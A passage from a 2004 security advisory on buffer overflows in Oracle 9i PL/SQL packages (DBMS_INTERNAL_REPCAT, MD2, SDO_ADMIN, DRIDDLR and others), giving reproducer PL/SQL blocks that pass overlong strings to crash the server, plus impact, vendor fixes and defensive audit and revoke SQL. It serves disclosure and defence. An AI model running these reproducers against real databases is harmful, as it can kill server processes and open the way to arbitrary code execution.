    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA role and by users granted execute permissions on the
    DBMS_INTERNAL_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #35 - Buffer overflow in procedure VALIDATE of DBMS_INTERNAL_REPCAT
    package
    Details:
    When VALIDATE procedure is called with a long string in the GNAME
    parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    RET_VALUE_X123 BINARY_INTEGER;
    P_GNAME VARCHAR2(32767);
    P_CHECK_GENFLAGS BOOLEAN;
    P_CHECK_VALID_OBJS BOOLEAN;
    P_CHECK_LINKS_SCHED BOOLEAN;
    P_CHECK_LINKS BOOLEAN;
    P_ERROR_MSG_ID NUMBER;
    P_ERROR_NUM_ID NUMBER;
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA || AAA;
    P_GNAME := AAA;
    P_CHECK_GENFLAGS := FALSE;
    P_CHECK_VALID_OBJS := FALSE;
    P_CHECK_LINKS_SCHED := FALSE;
    P_CHECK_LINKS := FALSE;
    P_ERROR_MSG_ID := 1;
    P_ERROR_NUM_ID := 1;
    RET_VALUE_X123 := SYS.DBMS_INTERNAL_REPCAT.VALIDATE(GNAME => P_GNAME,
    CHECK_GENFLAGS => P_CHECK_GENFLAGS, CHECK_VALID_OBJS =>
    P_CHECK_VALID_OBJS, CHECK_LINKS_SCHED => P_CHECK_LINKS_SCHED, CHECK_LINKS
    => P_CHECK_LINKS, ERROR_MSG_ID => P_ERROR_MSG_ID, ERROR_NUM_ID =>
    P_ERROR_NUM_ID);
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA role and by users granted execute permissions on the
    DBMS_INTERNAL_REPCAT package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #36 - Buffer overflow in procedure DIFFERENCES of DBMS_RECTIFIER_DIFF
    package
    Details:
    When the DIFFERENCES procedure is called with a long string in one of its
    parameters, a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    SYS.DBMS_RECTIFIER_DIFF.DIFFERENCES (SNAME1 => 'Y', ONAME1 => 'Y',
    REFERENCE_SITE => 'Y', SNAME2 => 'Y', ONAME2 => 'Y', COMPARISON_SITE =>
    'Y', WHERE_CLAUSE => 'Y', COLUMN_LIST => 'Y', MISSING_ROWS_SNAME => 'Y',
    MISSING_ROWS_ONAME1 => AAA, MISSING_ROWS_ONAME2 => 'Y',
    MISSING_ROWS_SITE => 'Y', MAX_MISSING => 1, COMMIT_ROWS => 1);
    END;

    Analysis:
    This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE
    or SYSDBA role and by users granted execute permissions on the
    DBMS_RECTIFIER_DIFF package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package
    Details:
    When ADD_COLUMN procedure is called with a long string in the SCHEMA_NAME
    parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_SCHEMA_NAME VARCHAR2(32767);
    P_OBJECT_NAME VARCHAR2(32767);
    P_COLUMN_NAME VARCHAR2(32767);
    P_DDL_TEXT CLOB;
    P_COLUMN_GROUP_NAME VARCHAR2(32767);
    P_NEW_GROUP VARCHAR2(32767);
    P_RETRY BOOLEAN;
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    P_SCHEMA_NAME := AAA;
    P_OBJECT_NAME := 'Y';
    P_COLUMN_NAME := 'Y';
    P_COLUMN_GROUP_NAME := 'Y';
    P_NEW_GROUP := 'Y';
    P_RETRY := FALSE;
    SYS.DBMS_REPCAT_RQ.ADD_COLUMN(SCHEMA_NAME => P_SCHEMA_NAME, OBJECT_NAME =>
    P_OBJECT_NAME, COLUMN_NAME => P_COLUMN_NAME, DDL_TEXT =>
    P_DDL_TEXT, COLUMN_GROUP_NAME => P_COLUMN_GROUP_NAME, NEW_GROUP =>
    P_NEW_GROUP, RETRY => P_RETRY);
    END;

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permissions on the DBMS_REPCAT_RQ package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package
    Details:
    When IS_MASTER procedure is called with a long string in the CANON_GNAME
    parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    RET_VALUE_X123 BOOLEAN;
    P_CANON_GOWNER VARCHAR2(32767);
    P_CANON_GNAME VARCHAR2(32767);
    P_MASTER VARCHAR2(32767);
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    P_CANON_GOWNER := '';
    P_CANON_GNAME := AAA;
    P_MASTER := '';
    RET_VALUE_X123 := SYS.DBMS_REPCAT_UTL.IS_MASTER(CANON_GOWNER =>
    P_CANON_GOWNER,CANON_GNAME => P_CANON_GNAME, MASTER => P_MASTER);
    END;

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permissions on the DBMS_REPCAT_UTL package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package
    Details:
    When PUSHDEFERREDTXNS procedure is called with a long string in the
    REPGRPNAME parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_REPGRPNAME VARCHAR2(32767);
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA || AAA;
    P_REPGRPNAME := AAA;
    SYS.LTUTIL.PUSHDEFERREDTXNS(REPGRPNAME => P_REPGRPNAME);
    END;

    Analysis:
    This vulnerability can be exploited by WMSYS, by members of the SYSDBA
    role and by users granted execute permissions on the LTUTIL package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.

    #41 - Buffer overflow in public procedure SDO_CODE_SIZE of MD2 package
    Details:
    When SDO_CODE_SIZE procedure is called with a long string in the LAYER
    parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE a BINARY_INTEGER; -- return value
    BEGIN
    a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => 'longstring');
    END;

    Analysis:
    By default SDO_CODE_SIZE has EXECUTE permission granted to PUBLIC, so any
    Oracle database user can exploit this vulnerability.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.

    #42 - Buffer overflow in public procedure VALIDATE_GEOM of MD2 package
    Details:
    When VALIDATE_GEOM procedure is called with a long string in the LAYER
    parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE a VARCHAR2(32767); -- return value
    BEGIN
    a := MDSYS.MD2.VALIDATE_GEOM (LAYER => 'longstring', GID => 1, ESEQ => 1);
    END;

    Analysis:
    By default VALIDATE_GEOM has EXECUTE permission granted to PUBLIC, so any
    Oracle database user can exploit this vulnerability.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.

    #43 - Buffer overflow in public procedure SDO_CODE_SIZE of SDO_ADMIN
    package
    Details:
    When SDO_CODE_SIZE procedure is called with a long string in the LAYER
    parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE a BINARY_INTEGER; -- return value
    BEGIN
    a := MDSYS.SDO_ADMIN.SDO_CODE_SIZE (LAYER => 'longstring');
    END;

    Analysis:
    By default SDO_CODE_SIZE has EXECUTE permission granted to PUBLIC, so any
    Oracle database user can exploit this vulnerability.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5). Fixed in 10g (10.1.0.2) Patch 2.

    #44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package
    Details:
    When SUBINDEXPOPULATE procedure is called with a long string in the
    LOGFILE parameter a buffer overflow occurs.

    To reproduce the overflow, execute the next PL/SQL:

    DECLARE
    P_INDEXID NUMBER;
    P_SLAVEID NUMBER;
    P_OPCODE NUMBER;
    P_LOGFILE VARCHAR2(32767);
    P_IDXMEM NUMBER;
    AAA VARCHAR2(32767);
    BEGIN
    AAA:='A';
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    AAA:=AAA || AAA;
    AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
    P_INDEXID := 1;
    P_SLAVEID := 1;
    P_OPCODE := 1;
    P_LOGFILE := AAA;
    P_IDXMEM := 1;
    CTXSYS.DRIDDLR.SUBINDEXPOPULATE(INDEXID => P_INDEXID, SLAVEID =>
    P_SLAVEID, OPCODE => P_OPCODE, LOGFILE => P_LOGFILE, IDXMEM => P_IDXMEM);
    END;

    Analysis:
    This vulnerability can be exploited by members of the SYSDBA role and by
    users granted execute permissions on the DRIDDLR package.
    Exploitation of this vulnerability allows an attacker to execute arbitrary
    code. It can also be exploited to cause a denial of service (DoS) by
    killing the Oracle server process.

    Vendor Fix:
    Fixed in Patchset 4 (9.2.0.5) Patch 3. 10g Release 1 not vulnerable.

    Comments:
    Exploitation of these vulnerabilities allows an attacker to completely
    compromise both the OS and the database if Oracle is running on the
    Windows platform, because there Oracle must run under the local System
    account or under an administrative account. If Oracle is running on *nix,
    only the database would be compromised, because Oracle usually runs under
    the oracle user, which has restricted permissions.

    Workaround:
     * Check package permissions and remove PUBLIC grants; set the minimal
    permissions that fit your needs
     * Restrict users from executing PL/SQL statements directly on the server
     * Periodically audit user permissions on all database objects
     * Lock users that are not in use
     * Change default passwords
     * Keep Oracle up to date with patches
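    The workaround list above and the package list earlier in this advisory can
    be turned into concrete checks. The following SQL is an added example
    written for this page, not code from the advisory, its authors or Oracle.
    It assumes a DBA session on an affected 9i or 10g release and relies only
    on the standard data dictionary views (DBA_TAB_PRIVS, DBA_ROLE_PRIVS,
    V$PWFILE_USERS, DBA_AUDIT_OBJECT, DBA_USERS) and the REVOKE and AUDIT
    statements; the package, owner and role names are taken from the advisory,
    and SCOTT appears only as a placeholder account.

```sql
-- Added example for this advisory (not Oracle's or the authors' code).
-- Assumes a DBA session on the affected 9i/10g release and the standard
-- data dictionary views; adjust the object list to what your site has.

-- 1. Affected packages that PUBLIC can execute. The advisory names
--    DBMS_REPCAT_INSTANTIATE, MD2 and SDO_ADMIN as public by default; the
--    LIKE clause also sweeps the whole DBMS_REPCAT* family listed above
--    (underscore escaped so it is not treated as a wildcard).
SELECT owner, table_name AS package_name, grantee, privilege
  FROM dba_tab_privs
 WHERE privilege = 'EXECUTE'
   AND grantee   = 'PUBLIC'
   AND ( (owner = 'SYS' AND table_name LIKE 'DBMS\_REPCAT%' ESCAPE '\')
      OR (owner, table_name) IN (
           ('SYS',    'DBMS_AQ_IMPORT_INTERNAL'),
           ('SYS',    'DBMS_AQADM'),
           ('SYS',    'DBMS_AQADM_SYS'),
           ('SYS',    'DBMS_DEFER_INTERNAL_SYS'),
           ('SYS',    'DBMS_DEFER_REPCAT'),
           ('SYS',    'DBMS_INTERNAL_REPCAT'),
           ('SYS',    'DBMS_RECTIFIER_DIFF'),
           ('SYS',    'LTUTIL'),
           ('MDSYS',  'MD2'),
           ('MDSYS',  'SDO_ADMIN'),
           ('CTXSYS', 'DRIDDLR')) )
 ORDER BY owner, table_name;

-- 2. Who holds the roles the advisory says reach the non-public packages,
--    and who is in the password file with SYSDBA / SYSOPER.
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('EXECUTE_CATALOG_ROLE', 'AQ_ADMINISTRATOR_ROLE',
                        'EXP_FULL_DATABASE', 'IMP_FULL_DATABASE')
 ORDER BY granted_role, grantee;

SELECT username, sysdba, sysoper
  FROM v$pwfile_users;

-- 3. Remove the PUBLIC grants on the public-by-default packages (#1, #41-#43).
--    Revoke only what your applications do not need: Oracle Spatial clients
--    may rely on the MDSYS packages, so test before doing this in production.
REVOKE EXECUTE ON SYS.DBMS_REPCAT_INSTANTIATE FROM PUBLIC;
REVOKE EXECUTE ON MDSYS.MD2 FROM PUBLIC;
REVOKE EXECUTE ON MDSYS.SDO_ADMIN FROM PUBLIC;

-- 4. Until the patchset is applied, record every call to packages that must
--    stay granted (requires the AUDIT_TRAIL parameter set to DB or OS).
AUDIT EXECUTE ON SYS.DBMS_REPCAT_AUTH BY ACCESS;
AUDIT EXECUTE ON SYS.DBMS_AQADM BY ACCESS;
AUDIT EXECUTE ON CTXSYS.DRIDDLR BY ACCESS;

-- 5. Review the audit trail. A RETURNCODE other than 0 is an error raised by
--    the call; a server process killed by one of these overflows normally
--    also leaves an ORA-07445 entry in the alert log at the same time.
SELECT timestamp, username, os_username, userhost, owner, obj_name,
       action_name, returncode
  FROM dba_audit_object
 WHERE obj_name IN ('DBMS_REPCAT_AUTH', 'DBMS_AQADM', 'DRIDDLR')
 ORDER BY timestamp DESC;

-- 6. "Lock users that are not in use": list open accounts, then lock the
--    ones nobody needs. SCOTT is a placeholder for such an account.
SELECT username, account_status, created
  FROM dba_users
 WHERE account_status = 'OPEN'
 ORDER BY username;

ALTER USER scott ACCOUNT LOCK;
```

    Run the SELECT statements first and keep their output as a baseline; the
    REVOKE, AUDIT and ALTER USER statements change the database and belong in
    the normal change process, because revoking PUBLIC EXECUTE on an MDSYS
    package will break any Spatial application that depends on it.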

    Vendor Contact:
    Vendor was contacted and has released fixes. Please click on each
    vulnerability to see details.

    Solution:
    For additional information, the official advisory from Oracle Corporation
    can be downloaded from:
    http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf

    ADDITIONAL INFORMATION

    The information has been provided by Cesar Cerrudo and Esteban Martinez
    Fayo of Application Security, Inc. (shatter@appsecinc.com).
    The original article can be found at:
    http://www.appsecinc.com/resources/alerts/oracle/2004-0001/
